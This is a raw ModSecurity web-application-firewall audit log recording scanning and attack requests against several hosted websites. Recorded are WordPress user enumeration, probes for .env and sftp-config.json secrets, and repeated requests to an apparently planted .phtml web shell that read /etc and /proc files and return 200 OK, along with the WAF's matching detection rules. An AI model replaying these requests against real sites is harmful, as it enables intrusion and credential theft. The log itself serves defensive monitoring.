X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --aedebc53-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kTfZLNtGrhJkyGMO_dgAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967949291246 982964 (- - -) Stopwatch2: 1749967949291246 982964; combined=2184, p1=345, p2=1742, p3=0, p4=0, p5=97, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aedebc53-Z-- --1dcd5314-A-- [15/Jun/2025:11:42:45.611764 +0530] aE5kXPY8XwHnhwwa9VWhJQAAAAk 117.220.91.3 60408 127.0.0.1 7081 --1dcd5314-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 117.220.91.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1dcd5314-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --1dcd5314-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kXPY8XwHnhwwa9VWhJQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967964474718 1137120 (- - -) Stopwatch2: 1749967964474718 1137120; combined=2200, p1=380, p2=1710, p3=0, p4=0, p5=109, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1dcd5314-Z-- --7a998f07-A-- [15/Jun/2025:11:43:02.063536 +0530] aE5kbC7IKUqG672kqSyz3AAAAAg 117.220.91.3 57498 127.0.0.1 7081 --7a998f07-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 117.220.91.3 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7a998f07-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --7a998f07-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kbC7IKUqG672kqSyz3AAAAAg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967980926720 1136903 (- - -) Stopwatch2: 1749967980926720 1136903; combined=2359, p1=332, p2=1916, p3=0, p4=0, p5=111, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7a998f07-Z-- --e9b6cf7b-A-- [15/Jun/2025:11:43:14.482642 +0530] aE5keRmnVjDRYaxdCWSxhwAAAAY 102.223.221.74 47216 127.0.0.1 7081 --e9b6cf7b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: www.dealsdray.com X-Real-IP: 102.223.221.74 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept-Encoding: gzip, deflate, br Cookie: wordpress_test_cookie=WP%20Cookie%20check Referer: https://www.dealsdray.com/wp-json/wp/v2/users/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e9b6cf7b-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.dealsdray.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --e9b6cf7b-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.dealsdray.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.dealsdray.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5keRmnVjDRYaxdCWSxhwAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749967993457319 1025399 (- - -) Stopwatch2: 1749967993457319 1025399; combined=2811, p1=441, p2=2258, p3=0, p4=0, p5=111, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9b6cf7b-Z-- --e41fac1b-A-- [15/Jun/2025:11:44:40.944150 +0530] aE5kz_zELXyWJtk-RXdGhwAAAAQ 51.21.247.146 51748 127.0.0.1 7081 --e41fac1b-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.pjsglobal.com X-Real-IP: 51.21.247.146 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 --e41fac1b-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 Cache-Control: no-cache X-Robots-Tag: noindex Link: <https://www.pjsglobal.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: Output is too small (less than 255 bytes) to be worth caching, This is a REST API request (identified by REST_REQUEST constant), This page returned an HTTP unauthorised response code (401) Cache-Control: private, must-revalidate Connection: close Content-Type: application/json; charset=UTF-8 --e41fac1b-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.pjsglobal.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.pjsglobal.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.pjsglobal.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5kz_zELXyWJtk-RXdGhwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/pjsglobal.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749968079612200 1332055 (- - -) Stopwatch2: 1749968079612200 1332055; combined=1959, p1=357, p2=1500, p3=0, p4=0, p5=101, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e41fac1b-Z-- --cd0cc23c-A-- [15/Jun/2025:11:52:48.181447 +0530] aE5muA2pbpddt_O7FYy7XAAAAAc 54.86.59.155 52234 127.0.0.1 7081 --cd0cc23c-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/user_map.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.86.59.155 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --cd0cc23c-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3075 Connection: close Content-Type: text/html; charset=UTF-8 --cd0cc23c-H-- Message: Warning. Matched phrase "etc/security/user" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/user found within ARGS:viewfile: /etc/security/user_map.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/user" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/user found within ARGS:viewfile: /etc/security/user_map.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5muA2pbpddt_O7FYy7XAAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749968568176642 4857 (- - -) Stopwatch2: 1749968568176642 4857; combined=2564, p1=481, p2=1946, p3=40, p4=39, p5=58, sr=149, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd0cc23c-Z-- --a6620372-A-- [15/Jun/2025:11:57:07.809386 +0530] aE5nu5X6T5jLdIl-tq4wrQAAAAM 52.169.15.141 58750 127.0.0.1 7081 --a6620372-B-- GET /images/stories/admin-post.php HTTP/1.0 Host: www.3econcepts.com X-Real-IP: 52.169.15.141 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wordpress_test_cookie=WP%20Cookie%20check --a6620372-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://www.3econcepts.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --a6620372-H-- Message: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. String match ".php" at REQUEST_FILENAME. [file "/etc/apache2/modsecurity.d/rules/comodo_free/24_Apps_Joomla.conf"] [line "74"] [id "240000"] [rev "1"] [msg "COMODO WAF: Protecting Joomla folder||www.3econcepts.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Joomla"] [hostname "www.3econcepts.com"] [uri "/images/stories/admin-post.php"] [unique_id "aE5nu5X6T5jLdIl-tq4wrQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/3econcepts.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749968827170973 638484 (- - -) Stopwatch2: 1749968827170973 638484; combined=1898, p1=310, p2=1484, p3=0, p4=0, p5=103, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a6620372-Z-- --f1398041-A-- [15/Jun/2025:12:02:16.523557 +0530] aE5o8JX6T5jLdIl-tq4xNQAAAAM 18.213.70.100 46434 127.0.0.1 7081 --f1398041-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/lvm2-lvmpolld HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.70.100 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --f1398041-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3301 Connection: close Content-Type: text/html; charset=UTF-8 --f1398041-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/lvm2-lvmpolld"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5o8JX6T5jLdIl-tq4xNQAAAAM"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/lvm2-lvmpolld"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5o8JX6T5jLdIl-tq4xNQAAAAM"] Apache-Handler: application/x-httpd-php Stopwatch: 1749969136519049 4561 (- - -) Stopwatch2: 1749969136519049 4561; combined=2533, p1=382, p2=1986, p3=38, p4=36, p5=91, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1398041-Z-- --ab189a47-A-- [15/Jun/2025:12:03:26.896730 +0530] aE5pNZX6T5jLdIl-tq4xSQAAAAM 209.74.79.20 36656 127.0.0.1 7081 --ab189a47-B-- GET /.env HTTP/1.0 Host: best-website-designs.com X-Real-IP: 209.74.79.20 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --ab189a47-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://best-website-designs.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --ab189a47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "best-website-designs.com"] [uri "/.env"] [unique_id "aE5pNZX6T5jLdIl-tq4xSQAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749969205739200 1157599 (- - -) Stopwatch2: 1749969205739200 1157599; combined=1781, p1=377, p2=1321, p3=0, p4=0, p5=83, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ab189a47-Z-- --c2392154-A-- [15/Jun/2025:12:08:35.918747 +0530] aE5qa3xTls_n68HhJPDTAgAAAAE 18.213.240.226 54448 127.0.0.1 7081 --c2392154-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//proc/self&viewfile=//proc/self/statm HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 18.213.240.226 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c2392154-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 2972 Connection: close Content-Type: text/html; charset=UTF-8 --c2392154-H-- Message: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/statm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "proc/self/stat" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: proc/self/stat found within ARGS:viewfile: /proc/self/statm"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE5qa3xTls_n68HhJPDTAgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749969515915035 3763 (- - -) Stopwatch2: 1749969515915035 3763; combined=1965, p1=342, p2=1516, p3=32, p4=24, p5=51, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c2392154-Z-- --f1d3355e-A-- [15/Jun/2025:12:15:36.340263 +0530] aE5sDpX6T5jLdIl-tq4yTAAAAAM 15.188.59.76 44594 127.0.0.1 7081 --f1d3355e-B-- GET /sftp-config.json HTTP/1.0 Host: www.tandonamit.com X-Real-IP: 15.188.59.76 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --f1d3355e-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://www.tandonamit.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 28834 Connection: close Content-Type: text/html; charset=UTF-8 --f1d3355e-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.tandonamit.com"] [uri "/sftp-config.json"] [unique_id "aE5sDpX6T5jLdIl-tq4yTAAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/tandonamit.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749969934479876 1860465 (- - -) Stopwatch2: 1749969934479876 1860465; combined=1891, p1=375, p2=1431, p3=0, p4=0, p5=84, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f1d3355e-Z-- --2a11e539-A-- [15/Jun/2025:12:23:58.269009 +0530] aE5uBbuLyDaLfLFz1OBSZQAAAAs 196.251.85.177 54288 127.0.0.1 7081 --2a11e539-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.futuronomics.com X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: wpr_guest_token=34c3d24c42101875de59efa9ca31db7d57594c6b0118c968ec6faf022f2c1936 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --2a11e539-F-- HTTP/1.1 401 Unauthorized X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.futuronomics.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type Allow: GET Vary: Origin,Accept-Encoding Connection: close Content-Type: application/json; charset=UTF-8 --2a11e539-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.futuronomics.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.futuronomics.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.futuronomics.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE5uBbuLyDaLfLFz1OBSZQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/futuronomics.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749970437123983 1145099 (- - -) Stopwatch2: 1749970437123983 1145099; combined=1873, p1=361, p2=1429, p3=0, p4=0, p5=82, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2a11e539-Z-- --2832703d-A-- [15/Jun/2025:12:27:15.802920 +0530] aE5uy5oX9bs_jrDBLBFkJQAAAAA 52.70.209.13 37626 127.0.0.1 7081 --2832703d-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/cryptdisks-early HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 52.70.209.13 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2832703d-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3389 Connection: close Content-Type: text/html; charset=UTF-8 --2832703d-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] 